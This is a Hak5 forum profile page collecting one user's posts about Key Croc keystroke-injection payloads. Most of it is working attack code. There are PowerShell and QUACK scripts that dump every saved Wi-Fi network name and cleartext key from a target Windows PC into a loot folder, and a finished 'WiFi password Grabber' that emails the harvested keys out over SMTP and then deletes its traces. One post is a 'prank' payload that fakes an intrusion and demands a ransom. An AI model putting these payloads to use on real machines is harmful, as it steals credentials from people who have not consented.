Jump to content

spywll

Active Members
  • Content Count

    58
  • Joined

  • Last visited

  • Days Won

    2

About spywll

  • Rank
    Hak5 Fan +

Profile Information

  • Gender
    Male
  • Location
    Canada
  • Interests
    Programming/Networking

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. yes it should just have to put your email address and password and the email it's going to it's been working for me
  2. need help with this i think this will auto the croc drive for us iam have a little trouble to get it to work #Get the path and file name that you are using for output # find connected KeyCroc drive: $VolumeName = "KeyCroc" $computerSystem = Get-CimInstance CIM_ComputerSystem $backupDrive = $null get-wmiobject win32_logicaldisk | % { if ($_.VolumeName -eq $VolumeName) { $backupDrive = $_.DeviceID } } #See if a loot folder exist in keycroc If not create one $TARGETDIR = $backupDrive + "\loot" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #See if a info folder exist in loot folder. If not create one $TARGETDIR = $backupDrive + "\loot\wifipass" if(!(Test-Path -Path $TARGETDIR )){ New-Item -ItemType directory -Path $TARGETDIR } #Create a path that will be used to make the file $datetime = get-date -f yyyy-MM-dd_HH-mm $backupPath = $backupDrive + "\loot\wifipass\" + $computerSystem.Name + " - " + $datetime + ".txt" #Create output from info script $TARGETDIR = $MyInvocation.MyCommand.Path $TARGETDIR = $TARGETDIR -replace ".......$" cd $TARGETDIR PowerShell.exe -ExecutionPolicy Bypass -File > $backupPath trouble iam having with is how to set up the #Create a path that will be used to make the file #Create output from info script
  3. have you try this with just using PowerShell and it's working? will this work on all pc like Windows 7,8,10? if its working by just using PowerShell start to put the payload together. how many old pc you come across with a good work hard drive?
  4. hey RootJunky iam able to save to the loot folder with this can you give it a try MATCH tttt QUACK GUI r QUACK DELAY 1000 QUACK STRING powershell QUACK ENTER QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING "(netsh wlan show profiles) | Select-String \"\:(.+)$\" | %" QUACK STRING "{\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | " QUACK STRING " Select-String \"Key Content\W+\:(.+)\$\"" QUACK STRING " | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_}" QUACK STRING " | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }}" QUACK STRING " | Format-Table -Wrap" QUACK STRING " | Out-File \"\$env:userprofile\Desktop\WirelessNetworkPasswords.txt\"" QUACK ENTER QUACK DELAY 1000 QUACK ENTER QUACK ENTER QUACK DELAY 1000 udisk unmount ATTACKMODE HID STORAGE QUACK DELAY 9000 #you will have to change your path here QUACK STRING "\$_SourcePath =\"C:\Users\spywill\Desktop\WirelessNetworkPasswords.txt\"" QUACK ENTER QUACK DELAY 1000 #you may need to change for the croc drive letter here (will have to find away to auto this part later) QUACK STRING "\$_DestinationPath =\"E:\loot\"" QUACK ENTER QUACK ENTER QUACK DELAY 1000 QUACK STRING "Move-item -path \$_SourcePath -destination \$_DestinationPath" QUACK ENTER QUACK DELAY 1000 QUACK ENTER QUACK STRING exit QUACK ENTER ATTACKMODE HID QUACK DELAY 5000 ATTACKMODE HID QUACK UNLOCK we are so close next is to convert the config.txt
  5. i found this for move file in powershell In the PowerShell window, type the command below and press ENTER. After the –path parameter,type the path of the file on your local PC that you want to copy, and after the –destination parameter, type the path of the destination folder. In the example below, I’m moving a file called URL_List.txt from the Source File Path folder to Destination File Path folder. 1 2 3 4 $_SourcePath = "D:\BLOG\Power Shell\Examples\Source File Path\URL_List.txt" $_DestinationPath = "D:\BLOG\Power Shell\Examples\Destination File Path" Move-item –path $_SourcePath –destination $_DestinationPath OR we can directly mention the path of files location without -path Keyword 1 Move-item $_SourcePath $_DestinationPath $_FileType array which containing the list of file types that need to move. After execution, all .html and .txt files will move from source to destination folder. 1 2 3 4 5 6 7 8 #location of starting directory $_sourcePath ="C:\Users\dotnet-helpers\Desktop\SourcePath" #location where files will be copied to $_destinationPath = "C:\Users\dotnet-helpers\Desktop\DestinationPath"; #Array of extension that need to move from source path $_FileType= @("*html*", "*.*txt") Get-ChildItem -recurse ($_sourcePath) -include ($_FileType) | move-Item -Destination ($_destinationPath) i been test with this MATCH tttt QUACK GUI r QUACK DELAY 1000 QUACK STRING powershell QUACK ENTER QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING "(netsh wlan show networks) | Select-String \"\:(.+)$\" | %" QUACK STRING "{\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | " QUACK STRING " Select-String \"Key Content\W+\:(.+)\$\"" QUACK STRING " | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_}" QUACK STRING " | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }}" QUACK STRING " | Format-Table -Wrap" QUACK STRING " | Out-File \"\$env:userprofile\Desktop\WirelessNetworkPasswords.txt\"" QUACK ENTER QUACK DELAY 5000 QUACK STRING netsh wlan show networks \| Out-File \"\$env:userprofile\\Desktop\\WirelessNetworks.txt\" QUACK ENTER udisk unmount ATTACKMODE HID STORAGE QUACK DELAY 5000 QUACK STRING "\$_SourcePath = \"C:\Users\spywill\Desktop\WirelessNetworks.txt" QUACK ENTER QUACK STRING "\$_DestinationPath = \"E:\loot" QUACK ENTER QUACK DELAY 5000 QUACK STRING "Move-item –path \$_SourcePath –destination \$_DestinationPath\"" ( -and this line will not print the hole string) QUACK ENTER QUACK DELAY 5000 QUACK STRING exit QUACK ENTER # --> Returning to HID ModeATTACKMODE HIDQUACK DELAY 5000ATTACKMODE HID this is what i get its like it can't see the drive letter E (C) is my pc and (E) is the croc At line:2 char:22 + $_DestinationPath = "E:\loot + ~~~~~~~ Unexpected token 'E:\loot' in expression or statement. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : UnexpectedToken PS C:\Users\spywill> Move-item -and this line will not print the hole string cmdlet Move-Item at command pipeline position 1 Supply values for the following parameters: Path[0]: exit Path[1]:
  6. good work i have been trying some line to copy it over but no luck QUACK STRING "Move-Item C:\Users\spywill\Desktop\WirelessNetworks.txt E:\loot" QUACK STRING "Copy-Item C:\Users\spywill\Desktop\WirelessNetworks.txt E:\loot -R" this two line iam not to sure on how to config them QUACK STRING Copy-Item -Path \\fs\Shared\it\users.xlsx -Destination \\fs2\Backups\it\users.xlsx QUACK STRING Move-Item -Path \\fs\Shared\Backups\1.bak -Destination \\fs2\Backups\archive\1.bak Iam getting errors likes this but my croc comes up as (E) for the drvie letter Move-Item : A positional parameter cannot be found that accepts argument 'E:' At line:1 char:1 + Move-Item C:\Users\spywill\Desktop\WirelessNetworks.txt E: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (:) [Move-Item], ParameterBindingException + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.MoveItemCommand i tried out your payload i get the same errors but looks like its getting closer
  7. ok i started on the payload but now i need some help need to get the .txt file to the croc now and use Rootjunky QUACK STRING $(grep -rl "WIFI_SSID" /root/udisk/config.txt | xargs sed -i 's/WIFI_SSID 2WIRE111/WIFI_SSID KeyCroc/g') some how to convert the config.txt with what we got so far. the last string i don't know how to get it to the croc root/udisk just a thought would i have to mount the udisk then run the payload then unmount the udisk? MATCH tttt QUACK GUI r QUACK DELAY 1000 QUACK STRING powershell QUACK ENTER QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING "(netsh wlan show networks) | Select-String \"\:(.+)$\" | %" QUACK STRING "{\$name=\$_.Matches.Groups[1].Value.Trim(); \$_} | %{(netsh wlan show profile name=\"\$name\" key=clear)} | " QUACK STRING " Select-String \"Key Content\W+\:(.+)\$\"" QUACK STRING " | % {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_}" QUACK STRING " | %{[PSCustomObject]@{ PROFILE_NAME=\$name;PASSWORD=\$pass }}" QUACK STRING " | Format-Table -Wrap" QUACK STRING " | Out-File \"\$env:userprofile\Desktop\WirelessNetworkPasswords.txt\"" QUACK ENTER QUACK DELAY 1000
  8. this line of code in powershell will print the ssid and passwd to your desktop in .txt just wounding how to change the end of the line to save to the croc /root/udisk? (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-File "$env:userprofile\Desktop\WirelessNetworkPasswords.txt" just thinking if we change the the last line to Out-File "$env:/root/udisk/WirelessNetworkPasswords.txt" i have not test it yet on the croc because i'll have to \ some characters before i start to test this on the croc do you think by changing the last line will work in the first place? how dose your pc see the /root/udisk without being in arm mode? Thanks
  9. I am sorry i see what your saying your talking about the \ symbol escape yes your right you don't need them there. name=\"%i\" key=clear - should be name="%i" key=clear everything passed to QUACK STRING is interpreted by bash - so you may need to escape some special characters. i just started adding \ escape to the payload to make it work and once it work i left it alone BIG Thanks Dice i will update
  10. Open a command prompt. Type the netsh wlan show profiles command into the command prompt, and press Enter.You will now see a list of all wireless network profiles on each interface on your PC. Make note of the wireless profile SSID name you want to see the password (security key) of. Type the command below into the command prompt, and press Enter. netsh wlan show profile name="SSID" key=clearSubstitute SSID in the command above with the actual wireless network profile SSID name. Substitute SSID in the command above with the actual wireless network profile SSID name. You will see this wireless network's security key to the right of Key Content under the Security settings section. or run this in powershell (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -Wrap Don't know if this helps you but it help me Different ways of doing it just that way worked for me
  11. hi would you be able to tell me if this line would identify the croc as the udisk on the croc? REM Define KEYCROC drive as %udisk% STRING "for /f %d in ('wmic volume get driveletter^, label ^| findstr "KEYCROC"') do set udisk=%d" first we need to identify the udisk on the croc before we can save the output log.txt of ssid and passwd to the udisk of the croc is this right? and would mkdir commands be good to create the directory and save and to recall are outputs? remember iam still new to programming right now iam still just learning python/networking if you have the patience for me i think we can get this payload to work thanks
  12. thanks iam assuming the same string can be use for the WIFI_PASS ? This is a good start
  13. I would need a lot of help if anyone is up for it with the payload we have for the croc now we are able to get the SSID and the password from the target right so what iam thinking about is what if you don't know the target SSID or passwd then you can't get the croc on line is there a posability to create a payload with some of the methods we have now with grabbing ssid and passwd (wifi)and use it to configure the config.txt file on the croc to automatically to connect to there target wifi? I know we have to enter arm mode to edit the config.txt file for wifi so don't know if this will work thanks for any feed back
  14. PRANK HACK FOR LINUX FOR FUN This should work on all linux i tested it on parrot os this will not work on a raspberry pi. You may need to change the terminal not all linux use mate-terminal IN time i will update it to make it look more real ENJOY AND HAVE FUN MATCH hacking QUACK LOCK QUACK ALT F2 QUACK DELAY 500 QUACK STRING "mate-terminal" QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING "I WILL START TO HACK YOU NOW" QUACK ENTER QUACK DELAY 1000 QUACK ENTER QUACK STRING "ifconfig" QUACK ENTER QUACK DELAY 1000 QUACK ALT F2 QUACK DELAY 1000 QUACK STRING "mate-terminal" QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING "netstat" QUACK DELAY 1000 QUACK ENTER QUACK DELAY 5000 QUACK ALT F2 QUACK DELAY 1000 QUACK STRING "mate-terminal" QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING "IAM STILL HACKING YOU" QUACK ENTER QUACK DELAY 1000 QUACK STRING "PAY \$ 100 000 000 AND THE HACK WILL STOP" QUACK ENTER QUACK DELAY 9000 QUACK ALT F2 QUACK DELAY 500 QUACK STRING "mate-terminal" QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING "python3" QUACK DELAY 500 QUACK ENTER QUACK DELAY 1000 QUACK STRING "print('YES STILL HACKING YOU')" QUACK ENTER QUACK DELAY 1000 QUACK STRING "print(' I HAVE ALL YOUR PASSWORDS NOW ' * 100)" QUACK ENTER QUACK DELAY 9000 QUACK ENTER QUACK DELAY 1000 QUACK STRING "print(' 010110 1100101 10011101 ' * 1000)" QUACK ENTER QUACK DELAY 5000 QUACK UNLOCK Prank-hack-linux.txt
  15. WiFi password Grabber (Windows 10) This script will grab not just the current SSID and password your computer is connecting to but every single SSID and password you have previously connected/saved on your computer. And it works even if the WiFi name contains special characters (such as a smiley face) or spaces. I'm not using gmail here because Google is pretty restrictive when it comes to 3rd party app authentication (let me know if it works with other mail server such as yahoo, zoho, etc) You might want to adjust the DELAY depending on the system you are running e.g set a higher delay time if your system is slow. Change the following things: ACCOUNT: Your hotmail/outlook account PASSWORD: Your hotmail/outlook password RECEIVER: The email you want to send the content of Log.txt to I have tested this myself and it works some time you may need to run it 2 or 3 times and you can change the MATCH to what you want MATCH wifipass QUACK DELAY 1000 QUACK REM --> Minimize all windows QUACK WINDOWS d QUACK REM --> Open cmd QUACK WINDOWS r QUACK DELAY 1000 QUACK STRING "cmd" QUACK ENTER QUACK DELAY 1000 QUACK REM --> Get all SSID QUACK STRING "cd %USERPROFILE% & netsh wlan show profiles | findstr \"All\" > a.txt" QUACK ENTER QUACK REM --> Create a filter.bat to get all the profile names QUACK STRING "echo setlocal enabledelayedexpansion^" QUACK ENTER QUACK ENTER QUACK STRING "for /f \"tokens=5*\" %%i in (a.txt) do (^" QUACK ENTER QUACK ENTER QUACK STRING "set val=%%i %%j^" QUACK ENTER QUACK ENTER QUACK STRING "if \"!val:~-1!\" == \" \" set val=!val:~0,-1!^" QUACK ENTER QUACK ENTER QUACK STRING "echo !val!^>^>b.txt) > filter.bat" QUACK ENTER QUACK REM --> Run filter.bat and save all profile names in b.txt QUACK STRING "filter.bat" QUACK DELAY 1000 QUACK ENTER QUACK REM --> Save all the good stuff in Log.txt and delete the other garbage files QUACK STRING "(for /f \"tokens=*\" %i in (b.txt) do @echo SSID: %i & netsh wlan show profiles name="%i" key=clear | findstr /c:\"Key Content\" & echo.) > Log.txt" QUACK ENTER QUACK DELAY 1000 QUACK STRING "del a.txt b.txt filter.bat" QUACK ENTER QUACK REM --> Mail Log.txt QUACK STRING "powershell" QUACK ENTER QUACK DELAY 1000 QUACK STRING "\$SMTPServer = 'smtp-mail.outlook.com'" QUACK ENTER QUACK STRING "\$SMTPInfo = New-Object Net.Mail.SmtpClient(\$SmtpServer, 587)" QUACK ENTER QUACK STRING "\$SMTPInfo.EnableSSL = \$true" QUACK ENTER QUACK STRING "\$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(\"your email here\", \"password here\")" QUACK ENTER QUACK STRING "\$ReportEmail = New-Object System.Net.Mail.MailMessage" QUACK ENTER QUACK STRING "\$ReportEmail.From = 'your email here'" QUACK ENTER QUACK STRING "\$ReportEmail.To.Add('add email to send to here')" QUACK ENTER QUACK STRING "\$ReportEmail.Subject = 'WiFi key grabber'" QUACK ENTER QUACK STRING "\$ReportEmail.Body = (Get-Content Log.txt | out-string)" QUACK ENTER QUACK STRING "\$SMTPInfo.Send(\$ReportEmail)" QUACK ENTER QUACK DELAY 3000 QUACK STRING "exit" QUACK ENTER QUACK DELAY 1000 QUACK REM --> Delete Log.txt and exit QUACK STRING "del Log.txt & exit" QUACK ENTER BIG THANKS TO Darren Kitchen RootJunky and Cribbit for all the help window-wifi-passwd.txt
×
×
  • Create New...